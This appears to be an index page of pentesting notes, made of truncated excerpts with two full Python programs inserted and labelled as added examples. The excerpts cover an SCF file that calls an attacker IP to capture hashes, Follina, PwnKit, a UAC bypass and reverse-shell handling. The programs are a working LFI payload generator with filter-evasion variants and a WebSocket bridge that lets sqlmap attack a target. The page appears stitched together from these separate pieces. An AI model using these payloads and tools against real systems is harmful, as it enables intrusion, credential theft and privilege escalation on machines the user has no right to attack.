Shuciran Pentesting Notes

SMB Share with Writing Permissions (SCF Attack)

SCF Attack First we need to write a file inside a share on which we have write permissions: (root㉿kali)-[/mnt/tempMount/Users/Public] └─# cat test.scf [Shell] Command=2 IconFile=\\10.10.14.4\...

Local File Inclusion

Simple LFI If a URL parameter accepts user input, we can try to reference an arbitrary system file and check whether the response contains that file's contents: http://10.11.1.35/section.php?page=/etc/passwd http://1...
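The check above, as an added example that is not part of the original note: it generates the usual candidate values for the vulnerable parameter (absolute path, `../` traversal at increasing depth, a null-byte suffix for old PHP, a traversal that survives one non-recursive strip of `../`, and the `php://filter` wrapper) and decides whether a response body really carries the requested file by looking for a known signature instead of trusting a 200 status. The base URL and parameter name are the ones from the note; the signature table and the helper names are assumptions for illustration.

```python
import base64
import re
from urllib.parse import quote

# Content that proves the target file was actually included, rather than the
# application echoing the parameter back. Table is an assumption for this example.
FILE_SIGNATURES = {
    "/etc/passwd": re.compile(r"^root:x?:0:0:", re.M),
    "/etc/hosts": re.compile(r"^127\.0\.0\.1\s+localhost", re.M),
    "/proc/self/environ": re.compile(r"(^|\x00)PATH="),
}


def lfi_payloads(target: str, max_depth: int = 6):
    """Candidate values for the vulnerable parameter, from plain to evasive:
    absolute path; ../ traversal at increasing depth; a null-byte suffix for
    PHP < 5.3.4 (cuts off an extension the app appends); a double traversal
    that survives one non-recursive strip of "../"; and the php://filter
    wrapper, which returns the file base64-encoded (reads .php source without
    executing it)."""
    rel = target.lstrip("/")
    yield target
    for depth in range(1, max_depth + 1):
        yield "../" * depth + rel
    yield target + "%00"
    yield "....//....//....//" + rel
    yield "php://filter/convert.base64-encode/resource=" + target


def build_urls(base_url: str, param: str, target: str) -> list:
    """Full request URLs; / : % = stay unencoded so wrappers and %00 reach the server as-is."""
    return [f"{base_url}?{param}={quote(p, safe='/:%=')}" for p in lfi_payloads(target)]


def looks_included(body: str, target: str) -> bool:
    """True when the response body contains the known signature of the requested file."""
    sig = FILE_SIGNATURES.get(target)
    return bool(sig and sig.search(body))


def decode_filter_output(body: str) -> str:
    """php://filter/convert.base64-encode returns the raw file base64-encoded; decode it."""
    return base64.b64decode(body.strip()).decode(errors="replace")


if __name__ == "__main__":
    # Print the candidate URLs for the target from the note; fetch each and pass
    # the body to looks_included() (or decode_filter_output() for the wrapper).
    for url in build_urls("http://10.11.1.35/section.php", "page", "/etc/passwd"):
        print(url)
```

Checking for a file signature matters because many applications answer 200 with an error page or the unmodified parameter, and a status-only check produces false positives.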

Websocket Exploitation

Redirect traffic to TCP localhost port We can redirect the websocket traffic to a TCP port on localhost so that we can interact with it as if it were a plain HTTP service: from http.server import SimpleHTTPRequest...
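The bridge described above, rewritten as an added example (not the code from the original note) using only the standard library, so the WebSocket side is visible: a local HTTP server takes `?payload=...`, opens a WebSocket to the target, verifies the handshake's `Sec-WebSocket-Accept`, sends the payload as one masked text frame and returns the first reply as the HTTP body. The target host, port and path (`WS_HOST`, `WS_PORT`, `WS_PATH`) and the local listening port are placeholders assumed for this example.

```python
import base64
import hashlib
import os
import socket
import struct
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"        # fixed by RFC 6455
WS_HOST, WS_PORT, WS_PATH = "10.10.11.20", 8080, "/ws"   # assumed target endpoint
LISTEN_PORT = 8000                                       # assumed local HTTP port


def accept_key(nonce: str) -> str:
    """Sec-WebSocket-Accept the server must return for our Sec-WebSocket-Key (RFC 6455 s4.2.2)."""
    return base64.b64encode(hashlib.sha1((nonce + WS_GUID).encode()).digest()).decode()


def encode_frame(payload: bytes, opcode: int = 0x1) -> bytes:
    """One complete client-to-server frame. Clients must mask: a random 4-byte key XORed over the payload."""
    n = len(payload)
    header = bytes([0x80 | opcode])                      # FIN=1, opcode 0x1 = text
    if n < 126:
        header += bytes([0x80 | n])                      # MASK bit + 7-bit length
    elif n < 1 << 16:
        header += bytes([0x80 | 126]) + struct.pack(">H", n)
    else:
        header += bytes([0x80 | 127]) + struct.pack(">Q", n)
    mask = os.urandom(4)
    return header + mask + bytes(b ^ mask[i % 4] for i, b in enumerate(payload))


def decode_frame(data: bytes):
    """Parse one frame at the start of data -> (opcode, payload, bytes_consumed), or None if incomplete.
    Server frames are unmasked; masked frames are unmasked too so the codec round-trips."""
    if len(data) < 2:
        return None
    opcode, masked, n, pos = data[0] & 0x0F, bool(data[1] & 0x80), data[1] & 0x7F, 2
    if n == 126:
        if len(data) < 4:
            return None
        n, pos = struct.unpack(">H", data[2:4])[0], 4
    elif n == 127:
        if len(data) < 10:
            return None
        n, pos = struct.unpack(">Q", data[2:10])[0], 10
    mask = b""
    if masked:
        mask, pos = data[pos:pos + 4], pos + 4
    payload = data[pos:pos + n]
    if len(payload) < n or (masked and len(mask) < 4):
        return None
    if masked:
        payload = bytes(b ^ mask[i % 4] for i, b in enumerate(payload))
    return opcode, payload, pos + n


def ws_exchange(message: str) -> str:
    """Open a fresh WebSocket, verify the handshake, send one text frame, return the first reply's payload."""
    nonce = base64.b64encode(os.urandom(16)).decode()
    request = (f"GET {WS_PATH} HTTP/1.1\r\nHost: {WS_HOST}:{WS_PORT}\r\n"
               "Upgrade: websocket\r\nConnection: Upgrade\r\n"
               f"Sec-WebSocket-Key: {nonce}\r\nSec-WebSocket-Version: 13\r\n\r\n")
    with socket.create_connection((WS_HOST, WS_PORT), timeout=10) as s:
        s.sendall(request.encode())
        buf = b""
        while b"\r\n\r\n" not in buf:                    # read the full 101 response
            chunk = s.recv(4096)
            if not chunk:
                raise ConnectionError("server closed during handshake")
            buf += chunk
        head, _, buf = buf.partition(b"\r\n\r\n")        # leftover bytes may already be a frame
        lines = head.decode().split("\r\n")
        got = {k.strip().lower(): v.strip() for k, v in (l.split(":", 1) for l in lines[1:] if ":" in l)}
        if got.get("sec-websocket-accept") != accept_key(nonce):
            raise ConnectionError("handshake rejected: " + lines[0])
        s.sendall(encode_frame(message.encode()))
        while (frame := decode_frame(buf)) is None:
            chunk = s.recv(4096)
            if not chunk:
                raise ConnectionError("server closed before replying")
            buf += chunk
    return frame[1].decode(errors="replace")


class Bridge(BaseHTTPRequestHandler):
    """GET /?payload=... on localhost is relayed as one WebSocket text frame; the reply becomes the HTTP body."""
    def do_GET(self):
        payload = parse_qs(urlparse(self.path).query).get("payload", [""])[0]
        try:
            body, status = ws_exchange(payload).encode(), 200
        except OSError as exc:                           # ConnectionError, timeout, refused
            body, status = str(exc).encode(), 502
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    HTTPServer(("127.0.0.1", LISTEN_PORT), Bridge).serve_forever()
```

Once it is running, tools that only speak HTTP (curl, Burp, sqlmap with `http://127.0.0.1:8000/?payload=*`) can be pointed at the bridge. One connection per request keeps it stateless; if the target needs a session or a JSON envelope, wrap the payload inside `ws_exchange()` before encoding the frame.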

SWAKS (Swiss Army Knife for SMTP)

Swaks is a featureful, flexible, scriptable, transaction-oriented SMTP test tool. Features include: SMTP extensions including TLS, authentication, pipelining, PROXY, PRDR, and XCLIENT Protoco...

Follina Exploitation

The following Follina exploit works pretty well; all you need to do is clone the repository and execute it as follows. The "-c" flag is the command to execute, and it can be a cmd or a PowerShell instruction...

Fully Interactive TTY (Linux)

Python Once we get access to the victim machine we stabilize the shell. First we need to press Ctrl + Z to suspend the shell as follows: tom@epsilon:/var/www/app$ ^Z zsh: suspended nc -lvnp 1235 Then t...

NodeJS

Read a file Create a file test.js with content: const fs = require('fs'); fs.readFile('/root/root.txt', 'utf-8', (err, data) =>{ if (err) throw err; console.log(data); }); To e...

Kerberos Exploitation

Authentication method gssapi-with-mic (krb5.conf file) If we receive the following message while trying to authenticate with any service: debug1: SSH2_MSG_EXT_INFO received debug1: kex_input_ext_in...

(UAC) Bypass - fodhelper.exe

UAC can be bypassed in various ways. This post covers a single technique that allows a user in the Administrators group to bypass UAC by silently elevating the process integrity level from medium to high. Most of the public...

Pkexec Privilege Escalation

PwnKit (ly4k) This repository contains a pretty good PwnKit exploit for pkexec. In order to exploit it, we need to download the PwnKit.c source and compile it from our Kali: (This is to compile with x32 ...